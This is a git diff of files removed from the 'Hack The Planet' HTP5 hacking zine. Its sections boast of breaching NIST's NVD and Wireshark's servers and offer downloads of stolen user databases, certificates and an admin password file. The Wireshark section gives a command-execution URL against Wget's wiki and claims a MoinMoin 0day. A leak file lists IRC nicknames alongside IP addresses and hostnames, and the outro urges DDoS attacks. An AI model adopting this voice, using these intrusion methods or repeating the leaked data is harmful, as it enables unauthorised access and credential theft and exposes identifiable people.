░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░ ░░▒▓▓▓▓▒▒▒▓▒▓░
▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░ ░░░░░▒▒▓▓▒▒▒▒▒▓
▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒
▓▓▓▓▓▒▒▒▒▒▒▒▓▒ ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓
▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░ ░░░░░░░▒▒▒▒▓▓▒▓▓▒
░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░ ░░▒▒▓▓▓▓▓▓▓
░ ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░ ░░▒▒▒▒▓▓▓▓▒▓
░▒ ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░ ░▒▒▒▓▓▒▓█▓▒ ░░
░██░ ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒ ░
▒████░ ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒ ▓▒░
▒▓██████▒ ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒ ▓███▓▓▒▒░░
░▒▓██████████▓ ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒ ░██████████▓▓▓▒▒░░
░▒▓███████████████▓ ░░░░▒▒▒▒▒▒▒▒░░▒░ ▒█████████████████▓▓▒
░▒▓▓████████████████████▓░ ▓▓▓▓░▓▓▓░░░ ████████████████████
██████████████████████████▓░ ▓▓▓▓▓▓░ ▒███████████████████
████████████████████████████▒ ▓▓██ ▓██████████████████
█████████████████████████████▒ ████ ░██████████████████
██████████████████████████████▒ ▀████ ▒█████████████████
███████████████████████████████▓ █████ █████████████████
████████████████████████████████▓ ██████ ▒████████████████
█████████████████████████████████▓ ███████ ▓███████████████
██████████████████████████████████▓░ ████████ ░▓██████████████
████████████████████████████████████░ ▓████████ ▒██████████████
█████████████████████████████████████░ █████████ ██████████████
██████████████████████████████████████▒ █████████ ▓█████████████
███████████████████████████████████████▒ ██████████ ░█████████████
████████████████████████████████████████▓ ▒██████████ ▓████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
networks) and came across an individual who was pretty skilled with ColdFusion.
After due time, we invited him/her to HTP. He/she ended up manifesting the NULL
RDS 1day POC, which owned the NVD.
The NVD realized they were breached, and deleted the shells. Soon after, they
were shelled again. They deleted the shells again. Once again, they were
shelled. The DHS CSD was swift and unrelenting with their execution of the
DELETE key.
As fun as this was, the rest of HTP acknowledged what had been breached. We
switched tactics and proceeded to traverse the National Vulnerability Database
network. Two boxes down, we downloaded the CFM scripts and certificates hosted
within the NVD and NISTWEB servers. From them, we were able to authenticate
ourselves to access the DHS NIST/NVD user database (root slash period workspace
slash period garbage period).
Not knowing what to do, and realizing their DELETE key training had abandoned
them, the DHS CSD resorted to shutting the entire site down. It is our theory
their inspiration for this technique came from an NCIS episode:
http://www.youtube.com/watch?v=u8qgehH3kEQ
Included in this segment of HTP5 is the DHS NIST/NVD user database, along with
two certificates and their ColdFusion admin password.properties. Enjoy.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip
|- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

69
htp/HTP5/0x06_Wireshark.txt
View file

@ -1,69 +0,0 @@
███ ███ ▄████ ▄▄████▄▄ ███ ███
███ ███ ▄█████ ▄██▀ ▀██▄ ███ ███
███ ███ ▄██▀███ ███ ███ ███ ███
██████████ ▄██▀ ███ ███ ███▄███ W
███ ███ ▄██▀ ███ ███ ████████ I
███ ███ ▄██▀ ███ ███ ███ ███ ████ R
███ ███ ▄██████████ ▀██▄ ▄██▀ ███ ████ E
███ ███ ▄██▀ ███ ▀▀████▀▀ ███ ████ S
H
A
_____ R
███████████ ███ ███ ██████████ ,-:` \;',`'- K
███ ███ ███ ███ .'-;_,; ':-;_,'.
███ ███ ███ ███ /; '/ , _`.-\
███ ██████████ ███████ | '`. (` /` ` \`|
███ ███ ███ ███ |:. `\`-. \_ / |
███ ███ ███ ███ | ( `, .`\ ;'|
███ ███ ███ ███ \ | .' `-'/
███ ███ ███ ██████████ `. ;/ .'
`'-._____.-'`
███████▄▄ ███ ▄████ ███▄ ███ ██████████ ███████████ /""-._
███ ▀██▄ ███ ▄█████ ████▄ ███ ███ ███ . '-,
███ ███ ███ ▄██▀███ █████▄ ███ ███ ███ : '',
███ ▄██▀ ███ ▄██▀ ███ ███▀██▄ ███ ███████ ███ ; * '.
███████▀▀ ███ ▄██▀ ███ ███ ▀██▄███ ███ ███ ' * () '.
███ ███ ▄██▀ ███ ███ ▀█████ ███ ███ \ \
███ ███ ▄██████████ ███ ▀████ ███ ███ \ _.---.._ '.
███ ████████ ▄██▀ ███ ███ ▀███ ██████████ ███ : .' _.--''-'' \ ,'
.._ '/.' . ;
; `-. , \'
; `, ; ._\
; \ _,-' ''--._
: \_,-' '-._
\ ,-' . '-._
.' __.-''; \...,__ '.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 0x06 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.' _,-' \ \ ''--.,__ '\
/ _,--' ; \ ; "^.}
For the final segment of HTP5, we present: Wireshark. ;_,-' ) \ )\ ) ;
/ \/ \_.,-' ;
Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget / ;
were all compromised by moinmelt.py, our RXE 0day for ,-' _,-'''-. ,-., ;
MoinMoin (included in HTP5). Hell, Wget is still ,-' _.-' \ / |/'-._...--'
shelled. Would someone please update them? It's been :--`` )/
months by now:
http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a
We had our sights set on backdooring Mercurial, which
would land us shells on UnrealIRCd (3rd time!), Firefox,
QuakeNet, Pidgin, and Debian repositories. However, we
were more interested in having fun, so instead we dropped
into Wireshark's server.
After 24 hours, Wireshark's server 'splash' returned a shell.
It featured a 3.7 kernel and an Apache httpd, which hosted
both the blog and the wiki. Permissions were read-world on
the config files, and we couldn't help ourselves. We then
proceeded to monitor Wireshark's www-data mail, as well as
download their user databases. All of the above is included
in the concluding segment of HTP5. Enjoy your corporate
security access.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip
|- 1.3MB | 31MB compressed Wireshark data
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

51
htp/HTP5/0x07_Outro.txt
View file

@ -1,51 +0,0 @@
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄
█ █ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ HTP5
█ █ █ █ █ █▄▄█ █ █
█▄▄▄█ █▄▄█ █ █ ▀▄ █▄▄█
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
We've come a long way since we first showed up on the Scene. Current and past
crew of Hack The Planet, we appreciate your kickass effort that got us to this
point. Since our inception, we have unfortunately witnessed a few of our crew
members getting arrested. To them, we regret what has transpired, and wish you
all the best beyond HTP.
This zine, like all of the others, has been a blast to create. Those interested
can check out http://straylig.ht/ for past releases.
Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,
and DDoS Anonymous on sight.
Hack the Planet!
Shout Outs To:
> ACiD (colored ANSI)
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
|▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
|▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
\ |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
\ ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
,` ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ / ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF

1057
htp/HTP5/HTP5.txt
View file

File diff suppressed because it is too large Load diff

18
htp/HTP5/TOC.txt
View file

@ -1,18 +0,0 @@
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄
██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro █ █
█████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU ▀▀▀█ █▀▀
███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode █ █
█▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap █ █▄▄▄▄▄▄▄▄▄
███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri ▀▀▀▀█ █
█▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD █ █▀█ █
█▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark █ █▄█ █
█▓█ ________________________________ █▓█ > Art █ █▄▄▄▄▄▄
█▓█ HTP____________________MWTB_DLTR ███ > Zerodays ▀▀▀▀▀▀▀█ █
██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro █ █▀▀▀▀
█▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > See reverse for █ █▄▄▄▄
████ ████████████████████▓▓██████ ████ > HTP4 █ █
▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

81
htp/HTP5/index.html
View file

@ -1,81 +0,0 @@
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
<title>Hack The Planet - IN COMMONLY USED PASSWORDS WE TRUST</title>
<link href="../../style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!--<h1>Hack The Planet</h1>-->
<div name ="header">
<pre>
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
</pre>
</div>
<ul>
<li><a href="TOC.txt" class="zine">TOC</a></li>
<li><a href="0x00_Intro.txt" class="zine">Intro</a></li>
<li><a href="0x01_MIT-EDUCAUSE.txt" class="zine">MIT/EDUCAUSE</a> Files: <a href="../../files/educause.zip" class="zine">EDUCAUSE data</a></li>
<li><a href="0x02_Linode.txt" class="zine">Linode</a> Files: <a href="../../files/registrardata.txt" class="zine">registrardata.txt</a>, Screenshots <a href="../../files/ss1.png" class="zine">one</a> and <a href="../../files/ss2.png" class="zine">two</a></li>
<li><a href="0x03_Nmap.txt" class="zine">Nmap</a> Files: <a href="../..//files/nmap_dmca_lolg.txt" class="zine">Fyodor response</a> and <a href="../../files/krashed_and_fyodor.png" class="zine">Fyodor's last resort</a></li>
<li><a href="0x04_Sucuri.txt" class="zine">Sucuri</a> Files: <a href="../../files/dbs.tgz" class="zine">dbs.tgz</a></li>
<li><a href="0x05_NVD.txt" class="zine">NIST/NVD</a> Files: <a href="../../files/NVD.zip" class="zine">NVD.zip</a></li>
<li><a href="0x06_Wireshark.txt" class="zine">Wireshark</a> Files: <a href="../../files/wireshark.zip" class="zine">wireshark.zip</a></li>
<li>Art: <a href="../../files/art/htp5ansi.png " class="zine">ANSI</a>, <a href="../../files/art/htp.png" class="zine">graffiti</a>, and <a href="../../files/art/htp_wallpaper.jpg " class="zine">wallpaper</a></li>
<li>Zerodays: <a href="../../files/moinmelt.txt" class="zine">MoinMelt</a>, <a href="../../files/subzero.txt" class="zine">SubZero v2</a></li>
<li><a href="0x07_Outro.txt" class="zine">Outro</a></li>
<li><a href="HTP5.txt" class="zine"> HTP5 - Full text version</a></li>
</ul>
<br><br><br><br>
<!--<img src="blinking_cursor.gif">-->
<div name ="footer">
<pre>
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
</pre>
</div>
</body>
</html>

80
htp/HTP5/index.html.old
View file

@ -1,80 +0,0 @@
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
<title>Hack The Planet - IN COMMONLY USED PASSWORDS WE TRUST</title>
<link href="../../style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!--<h1>Hack The Planet</h1>-->
<div name ="header">
<pre>
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
</pre>
</div>
<ul>
<li><a href="TOC.txt" class="zine">TOC</a></li>
<li><a href="0x00_Intro.txt" class="zine">Intro</a></li>
<li><a href="0x01_MIT-EDUCAUSE.txt" class="zine">MIT/EDUCAUSE</a></li>
<li><a href="0x02_Linode.txt" class="zine">Linode</a></li>
<li><a href="0x03_Nmap.txt" class="zine">Nmap</a></li>
<li><a href="0x04_Sucuri.txt" class="zine">Sucuri</a></li>
<li><a href="0x05_NVD.txt" class="zine">NIST/NVD</a></li>
<li><a href="0x06_Wireshark.txt" class="zine">Wireshark</a></li>
<li>Art: <a href="../../files/art/htp5ansi.png " class="zine">ANSI</a>, <a href="../../files/art/htp.png" class="zine">graffiti</a>, and <a href="../../files/art/htp_wallpaper.jpg " class="zine">wallpaper</a></li>
<li>Zerodays: <a href="../../files/moinmelt.txt" class="zine">MoinMelt</a>, <a href="../../files/subzero.txt" class="zine">SubZero v2</a></li>
<li><a href="0x07_Outro.txt" class="zine">Outro</a></li>
</ul>
<br><br><br><br>
<!--<img src="blinking_cursor.gif">-->
<div name ="footer">
<pre>
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
</pre>
</div>
</body>
</html>

2
htp/README.md
View file

@ -1,2 +0,0 @@
# htp
Hack The Planet

106
htp/anonopsipleak2.txt
View file

@ -1,106 +0,0 @@
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
